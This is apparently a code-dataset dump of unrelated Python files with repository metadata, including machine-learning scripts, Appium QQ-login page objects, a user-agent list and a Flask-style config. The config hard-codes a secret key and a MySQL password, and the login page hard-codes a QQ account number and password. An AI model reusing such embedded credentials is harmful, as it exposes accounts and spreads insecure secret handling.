] | 8 | 2019-03-11T22:25:11.000Z | 2020-05-27T20:45:15.000Z | # Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
"""pipeformer."""
import uuid
from typing import Iterator, Optional
from .deploy import Deployer
from .identifiers import __version__
from .internal.arg_parsing import parse_args
from .internal.logging_utils import setup_logger
from .internal.structures import Config
__all__ = ("__version__", "cli")
def cli(raw_args: Optional[Iterator[str]] = None):
"""CLI entry point. Processes arguments, sets up the key provider, and processes requested action.
:returns: Execution return value intended for ``sys.exit()``
"""
args = parse_args(raw_args)
setup_logger(args.verbosity, args.quiet)
# 1. parse config file
project = Config.from_file(args.config)
# TODO: Use a better prefix
prefix = "pipeformer-" + str(uuid.uuid4()).split("-")[-1]
project_deployer = Deployer(project=project, stack_prefix=prefix)
project_deployer.deploy_standalone()
| 33.022727 | 103 | 0.741225 | 202 | 1,453 | 5.207921 | 0.564356 | 0.057034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009046 | 0.163111 | 1,453 | 43 | 104 | 33.790698 | 0.856086 | 0.519615 | 0 | 0 | 0 | 0 | 0.039098 | 0 | 0 | 0 | 0 | 0.023256 | 0 | 1 | 0.066667 | false | 0 | 0.466667 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
2482074f10e8565981ef5f29b1f4fe169b0567b5 | 238 | py | Python | Academic/Simple/ex_13.py | LookThisCode/Python-Basic-001 | ad9749e14864c2114d454d5984de62542eb7152a | [
"Apache-2.0"
] | null | null | null | Academic/Simple/ex_13.py | LookThisCode/Python-Basic-001 | ad9749e14864c2114d454d5984de62542eb7152a | [
"Apache-2.0"
] | null | null | null | Academic/Simple/ex_13.py | LookThisCode/Python-Basic-001 | ad9749e14864c2114d454d5984de62542eb7152a | [
"Apache-2.0"
] | null | null | null | __author__ = 'nickbortolotti'
from sys import argv
script, firts, second, third = argv
print "El scrip lleva por nombre", script
print "La variable uno lleva por nombre", firts
print "La variable 2", second
print "la variable 3", third | 23.8 | 47 | 0.752101 | 36 | 238 | 4.861111 | 0.583333 | 0.12 | 0.257143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010101 | 0.168067 | 238 | 10 | 48 | 23.8 | 0.873737 | 0 | 0 | 0 | 0 | 0 | 0.405858 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.142857 | null | null | 0.571429 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 3 |
24bc2e95dadb1642bf9d26937c852e1ec7730615 | 160 | py | Python | chaptertwo/namecases.py | cmotek/python_crashcourse | 29cbdd6699cd17192bb599d235852d547630d110 | [
"Apache-2.0"
] | null | null | null | chaptertwo/namecases.py | cmotek/python_crashcourse | 29cbdd6699cd17192bb599d235852d547630d110 | [
"Apache-2.0"
] | null | null | null | chaptertwo/namecases.py | cmotek/python_crashcourse | 29cbdd6699cd17192bb599d235852d547630d110 | [
"Apache-2.0"
] | null | null | null | name = "fRoDo"
lowercase_name = name.lower()
uppercase_name = name.upper()
titlecase_name = name.title()
print(lowercase_name, uppercase_name, titlecase_name) | 32 | 54 | 0.78125 | 21 | 160 | 5.666667 | 0.428571 | 0.201681 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 160 | 5 | 54 | 32 | 0.826389 | 0 | 0 | 0 | 0 | 0 | 0.031056 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.2 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
24bd1dafd359bf1c94c84098d0bd837f3503e96e | 184 | py | Python | test/data/users_guide/test_escape/main.py | frederic-loui/tenjin | 13fccc464f882133d11219f7660d8eac3c524ae6 | [
"MIT"
] | null | null | null | test/data/users_guide/test_escape/main.py | frederic-loui/tenjin | 13fccc464f882133d11219f7660d8eac3c524ae6 | [
"MIT"
] | null | null | null | test/data/users_guide/test_escape/main.py | frederic-loui/tenjin | 13fccc464f882133d11219f7660d8eac3c524ae6 | [
"MIT"
] | null | null | null | import tenjin
from tenjin.helpers import *
import cgi
engine = tenjin.Engine(path=['views'], escapefunc="cgi.escape", tostrfunc="str")
print(engine.get_template('page.pyhtml').script)
| 30.666667 | 80 | 0.766304 | 25 | 184 | 5.6 | 0.72 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076087 | 184 | 5 | 81 | 36.8 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0.157609 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.6 | 0 | 0.6 | 0.2 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
24db0bb65821f2657ff2f44911782f9dde13a2fb | 5,898 | py | Python | Regression/RegressionAdaBoost.py | lujunzju/MachineLearningForAirTicketPredicting | e64b6c75a00a8b2a74d67d132f6e5b852db9c974 | [
"MIT"
] | 47 | 2017-06-28T07:45:04.000Z | 2022-01-31T09:15:13.000Z | Regression/RegressionAdaBoost.py | lujunzju/MachineLearningForAirTicketPredicting | e64b6c75a00a8b2a74d67d132f6e5b852db9c974 | [
"MIT"
] | 2 | 2017-08-28T07:59:17.000Z | 2018-03-02T06:37:08.000Z | Regression/RegressionAdaBoost.py | lujunzju/MachineLearningForAirTicketPredicting | e64b6c75a00a8b2a74d67d132f6e5b852db9c974 | [
"MIT"
] | 20 | 2017-09-01T13:46:25.000Z | 2021-05-05T12:47:16.000Z | # system library
import numpy as np
# user-library
import RegressionBase
# third-party library
from sklearn.tree import DecisionTreeRegressor
from sklearn.ensemble import AdaBoostRegressor
from sklearn.grid_search import GridSearchCV  # moved to sklearn.model_selection in scikit-learn >= 0.20
from sklearn.metrics import mean_squared_error
from sklearn.learning_curve import validation_curve  # moved to sklearn.model_selection in scikit-learn >= 0.20
import matplotlib.pyplot as plt
class RegressionAdaBoost(RegressionBase.RegressionBase):
def __init__(self, isTrain):
super(RegressionAdaBoost, self).__init__(isTrain)
# data preprocessing
#self.dataPreprocessing()
# Create AdaBoost regression object
decisionReg = DecisionTreeRegressor(max_depth=10)
rng = np.random.RandomState(1)
self.adaReg = AdaBoostRegressor(decisionReg,
n_estimators=400,
random_state=rng)
def dataPreprocessing(self):
# due to the observation, standization does not help the optimization.
# So do not use it!
#self.Standardization()
pass
def parameterChoosing(self):
dts = []
dts.append(DecisionTreeRegressor(max_depth=5, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=7, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=9, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=11, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=12, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=14, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=15, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=17, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=19, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=21, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=22, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=24, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=26, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=27, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=31, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=33, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=35, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=37, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=39, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=41, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=43, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=45, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=47, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=49, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=50, max_features='auto'))
tuned_parameters = [{'base_estimator': dts,
'n_estimators': range(5,700),
'learning_rate': [1, 2, 3]
}
]
reg = GridSearchCV(AdaBoostRegressor(), tuned_parameters, cv=5, scoring='mean_squared_error')
reg.fit(self.X_train, self.y_train.ravel())
print("Best parameters set found on development set:\n")
print(reg.best_params_)
print("Grid scores on development set:\n")
for params, mean_score, scores in reg.grid_scores_:
print("%0.3f (+/-%0.03f) for %r\n" % (mean_score, scores.std() * 2, params))
print("MSE for test data set:\n")
y_true, y_pred = self.y_test, reg.predict(self.X_test)
print(mean_squared_error(y_true, y_pred))
def drawValidationCurve(self):
"""
To draw the validation curve
:return:NA
"""
X, y = self.X_train, self.y_train.ravel()
indices = np.arange(y.shape[0])
#np.random.shuffle(indices)
X, y = X[indices], y[indices]
train_sizes = range(5,700)
train_scores, valid_scores = validation_curve(self.adaReg, X, y, "n_estimators",
train_sizes, cv=5, scoring='mean_squared_error')
train_scores = -1.0/5 *train_scores
valid_scores = -1.0/5 *valid_scores
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
valid_scores_mean = np.mean(valid_scores, axis=1)
valid_scores_std = np.std(valid_scores, axis=1)
plt.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1,
color="r")
plt.fill_between(train_sizes, valid_scores_mean - valid_scores_std,
valid_scores_mean + valid_scores_std, alpha=0.1, color="g")
plt.plot(train_sizes, train_scores_mean, 'o-', color="r",
label="Training MSE")
plt.plot(train_sizes, valid_scores_mean, '*-', color="g",
label="Cross-validation MSE")
plt.legend(loc="best")
plt.xlabel('Estimators')
plt.ylabel('MSE')
plt.title('Validation Curve with AdaBoost-DecisionTree Regression\n on the parameter of Estimators when the Decision Tree has max depth=10')
plt.grid(True)
plt.show()
def training(self):
# train the linear regression model
self.adaReg.fit(self.X_train, self.y_train.reshape((self.y_train.shape[0], )))
def predict(self):
# predict the test data
self.y_pred = self.adaReg.predict(self.X_test)
# print MSE
mse = mean_squared_error(self.y_pred, self.y_test)
print("MSE: {}".format(mse))
| 43.367647 | 147 | 0.659546 | 716 | 5,898 | 5.223464 | 0.247207 | 0.057754 | 0.201604 | 0.220588 | 0.47861 | 0.411765 | 0.360428 | 0.340107 | 0 | 0 | 0 | 0.019859 | 0.231604 | 5,898 | 135 | 148 | 43.688889 | 0.805384 | 0.055103 | 0 | 0 | 0 | 0.010638 | 0.092383 | 0.003827 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.010638 | 0.085106 | null | null | 0.074468 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
24fd1f05e1ce552de13339e2d4ba380d9739f219 | 58 | py | Python | src/msanalyzer/__init__.py | marcusbfs/msanalyzer | 5a633716807a8ffe44c7651cf70de8fea10a1532 | [
"MIT"
] | null | null | null | src/msanalyzer/__init__.py | marcusbfs/msanalyzer | 5a633716807a8ffe44c7651cf70de8fea10a1532 | [
"MIT"
] | 1 | 2020-06-29T19:43:58.000Z | 2020-06-29T19:43:58.000Z | src/msanalyzer/__init__.py | marcusbfs/msanalyzer | 5a633716807a8ffe44c7651cf70de8fea10a1532 | [
"MIT"
] | null | null | null | from __future__ import annotations
__version__ = "3.8.0"
| 14.5 | 34 | 0.775862 | 8 | 58 | 4.625 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.06 | 0.137931 | 58 | 3 | 35 | 19.333333 | 0.68 | 0 | 0 | 0 | 0 | 0 | 0.086207 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
70019ac63a1505d65bbec211b82b3b5df817ad89 | 1,217 | py | Python | test.py | luch61008/olll | b09e7754034dbd94a61d35454190ba6d6bbcd190 | [
"MIT"
] | null | null | null | test.py | luch61008/olll | b09e7754034dbd94a61d35454190ba6d6bbcd190 | [
"MIT"
] | null | null | null | test.py | luch61008/olll | b09e7754034dbd94a61d35454190ba6d6bbcd190 | [
"MIT"
] | null | null | null | import olll
import numpy as np
test1 = [[1,0,0,1,1,0,1],[0,1,0,5,0,0,0],[0,0,1,0,5,0,5]]
test2 = [[1,0,0,2,-1,1],[0,1,0,3,-4,-2],[0,0,1,5,-10,-8]]
test3 = [[1,0,0,1,1,0,1], [0,1,0,4,-1,0,-1], [0,0,1,1,1,0,1]]
test4 = [[1,0,0,2,5,3],[0,1,0,1,1,1,],[0,0,1,4,-2,0]]
test5 = [[1,0,0,0,0,0,2,1,1,2],[0,1,0,0,0,0,1,1,-1,-1],[0,0,1,0,0,0,-1,0,-2,-3],[0,0,0,1,0,0,1,-1,1,-1],[0,0,0,0,1,0,-1,2,-4,-3],[0,0,0,0,0,1,1,0,0,1]]
test6 = [[1, 0, 0, 5, 0, 0, 0],[0, 1, 0, 0, 5, 0, 5],[0, 0, 1, 1, 1, 0, 1]]
test7 = [[1, 0, 0, 20, 0, 0, 0],[0, 1, 0, 0, 20, 0, 20],[0, 0, 1, 4, 4, 0, 4]]
test8 = [[1, 0, 0, 10, 0, 0, 0],[0, 1, 0, 0, 10, 0, 10],[0, 0, 1, 2, 2, 0, 2]]
n = input("Please enter n: \n")
n = int(n)
k = input("Please enter k: \n")
k = int(k)
p = input("Please enter p: \n")
p = int(p)
ident = np.identity(k)  # renamed from `id` to avoid shadowing the builtin
A = [[]] * k
print("Please enter the generating set:\n")
for i in range(k):
print("\nEnter the generator a[",i,"]: ")
a = list(map(int,input().strip().split()))[:n]
#print(i, a)
a = [x * (2**p) for x in a]
y = list(ident[i])
print(y[i],type(y[i]))
A[i] = y+a
print(A[i], type(A[i]))
print(A, type(A))
print(test7, type(test7))
rb = olll.reduction(test7,0.75)
print("Basis: ", rb)
| 31.205128 | 151 | 0.474938 | 322 | 1,217 | 1.795031 | 0.164596 | 0.17301 | 0.108997 | 0.076125 | 0.271626 | 0.186851 | 0.129758 | 0.062284 | 0.034602 | 0.034602 | 0 | 0.22145 | 0.172555 | 1,217 | 38 | 152 | 32.026316 | 0.352532 | 0.009039 | 0 | 0 | 0 | 0 | 0.101245 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.064516 | 0 | 0.064516 | 0.225806 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
70240807ca72daa40bb0285e918ba7616c10ff87 | 1,024 | py | Python | auto/AppTester/page/page.py | Strugglingrookie/oldboy2 | 8ed6723cab1f54f2ff8ea0947c6f982aef7e1b47 | [
"Apache-2.0"
] | 1 | 2021-06-15T07:01:23.000Z | 2021-06-15T07:01:23.000Z | auto/AppTester/page/page.py | Strugglingrookie/oldboy2 | 8ed6723cab1f54f2ff8ea0947c6f982aef7e1b47 | [
"Apache-2.0"
] | 3 | 2020-02-13T14:35:36.000Z | 2021-06-10T21:27:14.000Z | auto/AppTester/page/page.py | Strugglingrookie/oldboy2 | 8ed6723cab1f54f2ff8ea0947c6f982aef7e1b47 | [
"Apache-2.0"
] | 1 | 2020-04-09T02:13:12.000Z | 2020-04-09T02:13:12.000Z | from lib.appController import driver_queue
from lib.pyapp import Pyapp
import threading
# use thread-local storage to isolate each thread's driver when running in multiple threads
local = threading.local()
# On instantiation, fetch a ready-made driver from the queue; pass a driver explicitly when debugging a page
class BasePage(object):
def __init__(self, driver=None):
if driver is None:
local.driver = driver_queue.get()
local.pyapp = Pyapp(local.driver)
else:
local.driver = driver
local.pyapp = Pyapp(driver)
def quit(self):
local.driver.quit()  # `local.app` is never set; quit the thread-local driver instead
def reset_package(self):
local.pyapp.reset()
class QQ_Login_Page(BasePage):
def login(self):
local.pyapp.click('android=>new UiSelector().text("登 录")')
def username(self):
local.pyapp.type('content=>请输入QQ号码或手机或邮箱', 3408467505)
def passwd(self):
local.pyapp.type('content=>密码 安全', 'besttest123')
def login_check(self, name):
return local.pyapp.wait_and_save_exception('android=>new UiSelector().text("登 录")', name)
class Page(QQ_Login_Page):
pass
| 23.813953 | 97 | 0.658203 | 125 | 1,024 | 5.272 | 0.44 | 0.106222 | 0.084977 | 0.072838 | 0.15478 | 0.078907 | 0 | 0 | 0 | 0 | 0 | 0.016373 | 0.224609 | 1,024 | 42 | 98 | 24.380952 | 0.813602 | 0.067383 | 0 | 0 | 0 | 0 | 0.127101 | 0.023109 | 0 | 0 | 0 | 0 | 0 | 1 | 0.259259 | false | 0.074074 | 0.111111 | 0.037037 | 0.518519 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
7027aab2db4848e19c8bba08f545d442f47da027 | 126 | py | Python | swift/common/ring/__init__.py | vvechkanov/SwiftUml | 98fa5adfe5664dbb4f328ba2a1789a63c7550eed | [
"Apache-2.0"
] | 1 | 2021-01-06T12:40:43.000Z | 2021-01-06T12:40:43.000Z | swift/common/ring/__init__.py | Triv90/SwiftUml | 98fa5adfe5664dbb4f328ba2a1789a63c7550eed | [
"Apache-2.0"
] | null | null | null | swift/common/ring/__init__.py | Triv90/SwiftUml | 98fa5adfe5664dbb4f328ba2a1789a63c7550eed | [
"Apache-2.0"
] | null | null | null | from ring import RingData, Ring
from builder import RingBuilder
__all__ = [
'RingData',
'Ring',
'RingBuilder',
]
| 14 | 31 | 0.666667 | 13 | 126 | 6.153846 | 0.538462 | 0.3 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.230159 | 126 | 8 | 32 | 15.75 | 0.824742 | 0 | 0 | 0 | 0 | 0 | 0.18254 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
70384a2cc1df0e02dedd4b43b4487effab21a9f3 | 502 | py | Python | src/test_generator/ast_assertion.py | AAU-PSix/canary | 93b07d23cd9380adc03a6aa1291a13eaa3b3008c | [
"MIT"
] | null | null | null | src/test_generator/ast_assertion.py | AAU-PSix/canary | 93b07d23cd9380adc03a6aa1291a13eaa3b3008c | [
"MIT"
] | null | null | null | src/test_generator/ast_assertion.py | AAU-PSix/canary | 93b07d23cd9380adc03a6aa1291a13eaa3b3008c | [
"MIT"
] | null | null | null | from typing import Any
from .ast_expression import Expression
from .ast_statement import Statement
class Assertion(Statement):
def __init__(self, actual: Expression, expected: Expression) -> None:
self._actual = actual
self._expected = expected
@property
def actual(self) -> Expression:
return self._actual
@property
def expected(self) -> Expression:
return self._expected
def accept(self, visitor: Any):
visitor.visit_assertion(self) | 26.421053 | 73 | 0.693227 | 56 | 502 | 6.017857 | 0.357143 | 0.089021 | 0.118694 | 0.142433 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.227092 | 502 | 19 | 74 | 26.421053 | 0.868557 | 0 | 0 | 0.133333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 1 | 0.266667 | false | 0 | 0.2 | 0.133333 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
70a519e84ace4ea743e801d80cfc9c16a3a76337 | 529 | py | Python | mnu_gsheets/utils/user_agent.py | seanbreckenridge/mnu_gsheets | 4b531497003a790a2fd0bce2e892bfcb58da9e76 | [
"Apache-2.0"
] | 1 | 2021-04-24T22:45:17.000Z | 2021-04-24T22:45:17.000Z | mnu_gsheets/utils/user_agent.py | seanbreckenridge/mnu_gsheets | 4b531497003a790a2fd0bce2e892bfcb58da9e76 | [
"Apache-2.0"
] | null | null | null | mnu_gsheets/utils/user_agent.py | seanbreckenridge/mnu_gsheets | 4b531497003a790a2fd0bce2e892bfcb58da9e76 | [
"Apache-2.0"
] | null | null | null | from random import choice
user_agents = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108",
"Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90",
"Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/605.1.15 (KHTML, like Gecko)",
]
def random_user_agent() -> str:
return choice(user_agents)
| 40.692308 | 108 | 0.693762 | 93 | 529 | 3.88172 | 0.462366 | 0.088643 | 0.099723 | 0.132964 | 0.590028 | 0.465374 | 0.465374 | 0.465374 | 0.465374 | 0.34349 | 0 | 0.180804 | 0.153119 | 529 | 12 | 109 | 44.083333 | 0.625 | 0 | 0 | 0 | 0 | 0.444444 | 0.731569 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0.111111 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 3 |
560f1da729f378a242bc88563d83e2f7fd5ca92f | 120 | py | Python | pycodes/__init__.py | blazaid/pycodes | e263fad64ad7d056feb7ac2056e1d27aec52a6d9 | [
"Apache-2.0"
] | null | null | null | pycodes/__init__.py | blazaid/pycodes | e263fad64ad7d056feb7ac2056e1d27aec52a6d9 | [
"Apache-2.0"
] | null | null | null | pycodes/__init__.py | blazaid/pycodes | e263fad64ad7d056feb7ac2056e1d27aec52a6d9 | [
"Apache-2.0"
] | null | null | null | __version__ = '0.0.1'
__url__ = 'http://github.com/blazaid/pycodes/'
__author__ = 'blazaid'
def check_ean13():
pass | 20 | 46 | 0.691667 | 16 | 120 | 4.375 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.048077 | 0.133333 | 120 | 6 | 47 | 20 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0.380165 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0.2 | 0 | 0 | 0.2 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
5612e9e9a7262c254784a284937a576dbf7bc368 | 115 | py | Python | swig/build.py | ShawnZhong/python-c-extension | 99f14239f2c77fa463ef112124964ecbd31e2bbc | [
"W3C"
] | null | null | null | swig/build.py | ShawnZhong/python-c-extension | 99f14239f2c77fa463ef112124964ecbd31e2bbc | [
"W3C"
] | null | null | null | swig/build.py | ShawnZhong/python-c-extension | 99f14239f2c77fa463ef112124964ecbd31e2bbc | [
"W3C"
] | null | null | null | from setuptools import setup, Extension
setup(ext_modules=[
Extension('_module', sources=["module_wrap.c"])
]) | 23 | 51 | 0.73913 | 14 | 115 | 5.857143 | 0.785714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.113043 | 115 | 5 | 52 | 23 | 0.803922 | 0 | 0 | 0 | 0 | 0 | 0.172414 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.25 | 0 | 0.25 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
562aa92474de124a685af503bc30494105a08729 | 301 | py | Python | envs/hns/mujoco-worldgen/mujoco_worldgen/util/path.py | jiayu-ch15/curriculum | 7305833b8f875c91f7598029f63fd3e543a0fd82 | [
"MIT"
] | 424 | 2019-09-17T15:50:41.000Z | 2022-03-26T07:10:21.000Z | envs/hns/mujoco-worldgen/mujoco_worldgen/util/path.py | jiayu-ch15/curriculum | 7305833b8f875c91f7598029f63fd3e543a0fd82 | [
"MIT"
] | 7 | 2019-09-18T08:54:58.000Z | 2020-08-28T15:12:45.000Z | envs/hns/mujoco-worldgen/mujoco_worldgen/util/path.py | jiayu-ch15/curriculum | 7305833b8f875c91f7598029f63fd3e543a0fd82 | [
"MIT"
] | 81 | 2019-09-18T00:14:25.000Z | 2022-03-30T18:25:08.000Z | from os.path import abspath, dirname, join
WORLDGEN_ROOT_PATH = abspath(join(dirname(__file__), '..', '..'))
def worldgen_path(*args):
"""
Returns an absolute path from a path relative to the mujoco_worldgen repository
root directory.
"""
return join(WORLDGEN_ROOT_PATH, *args)
| 25.083333 | 83 | 0.700997 | 39 | 301 | 5.153846 | 0.589744 | 0.119403 | 0.159204 | 0.199005 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.182724 | 301 | 11 | 84 | 27.363636 | 0.817073 | 0.315615 | 0 | 0 | 0 | 0 | 0.021505 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
562ef59e8f3331ef65babdfc148475b7ce285811 | 545 | py | Python | backend/config.py | Xingwd/seer | 41c8a4571af3422eea1bc1befd5b60a9e4bd889b | [
"MIT"
] | null | null | null | backend/config.py | Xingwd/seer | 41c8a4571af3422eea1bc1befd5b60a9e4bd889b | [
"MIT"
] | null | null | null | backend/config.py | Xingwd/seer | 41c8a4571af3422eea1bc1befd5b60a9e4bd889b | [
"MIT"
] | null | null | null | # -*- coding: UTF-8 -*-
# https://dormousehole.readthedocs.io/en/latest/config.html#config
class Config(object):
SECRET_KEY = 'e9d37baf44de4b11a76159c50820468f'
SQLALCHEMY_TRACK_MODIFICATIONS = False
SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://xingweidong:xingweidong&123@localhost/idss_stock' # stock database (default)
SQLALCHEMY_BINDS = {
'fund': 'mysql+pymysql://xingweidong:xingweidong&123@localhost/idss_fund' # fund database
}
CHROME_DRIVER = '/Users/xingweidong/envs/selenium/webdriver/chrome/88.0.4324.96/chromedriver'
